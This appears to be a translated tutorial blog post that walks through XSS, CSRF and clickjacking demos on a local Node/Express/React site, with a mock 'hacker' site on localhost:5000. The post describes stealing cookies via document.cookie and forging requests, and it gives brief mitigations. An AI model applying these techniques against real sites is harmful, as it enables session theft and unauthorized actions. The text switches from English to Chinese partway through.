Introduction: I was learning node recently, and by the way, I wrote examples and solutions for web security attacks. After referring to some materials, I thought about it myself, the code is not very perfect, and node is also in the exploration stage, please forgive me. I hope it will be helpful to those students who are not very familiar with security and have unclear background knowledge.
For the solution, see the previous article ( theoretical article ), here we mainly demonstrate the attack principle
Code: [email protected] :StyLanQP/web-Safe.git
github address : github.com/StyLanQP/we…
The project code is as follows:
app: normal website
hack: website that simulates hacker attack
Technology used: node+express+react+mysql
Project Introduction
1. Code directory
2. Create a database
node app/mysql.js first execute this file to create tables and data
as the picture shows
1. XSS (Cross-Site Scripting) Cross-Site Scripting Attack
Principle: A malicious attacker inserts malicious executable webpage script code into a Web page. When the user browses the page, the script code embedded in the Web will be executed, so that the attacker can steal user information or otherwise violate user security. Privacy Purposes.
1. At this time, run the project npm run start to open the home page
At this time, the home page is written with a react template, and React DOMthe content (string) will be escaped during rendering, so the label in the form of a string will not be processed as a HTMLlabel , so the input script cannot be executed.
所以加了一个利用ejs模板加载的页面xss.html(无论是从url上输入script标签例如http://localhost:4000/xss?text=还是直接获取数据库存储的代码都会被执行)
2.开始利用document.cookie攻击,按照刚才的方式把改成进行攻击
打开http://localhost:4000/xss会看到请求了http://localhost:5000/xss.html的接口
在控制台可以看到5000端口的黑客网站已经打印出来了cookie,利用cookie我们完全可以在控制台设置cookie直接登录网站
二、CSRF 跨站点伪造
原理: 诱导用户打开黑客的网站,在黑客的网站中,利用用户登录状态发起跨站点请求。
1.在登录状态下,打开localhost:5000/csrf.html页面,在控制台上我们看到了setDataList的请求,这个就是提交内容的接口,在4000的home页面可以看到内容改变了
正常网站内容被更改
解决方案(生成token, 接口带上nonce和timesTamp)
三、点击劫持
原理:用户在登陆 A 网站的系统后,被攻击者诱惑打开第三方网站,而第三方网站通过 iframe 引入了 A 网站的页面内容,用户在第三方网站中点击某个按钮(被装饰的按钮),实际上是点击了 A 网站的按钮。
- 打开http://localhost:5000/clickHijack.html点击按钮,实际上是点击了http://localhost:4000/home的关注按钮,因为iframe嵌入了4000的页面
解决方案,对iframe嵌入做限制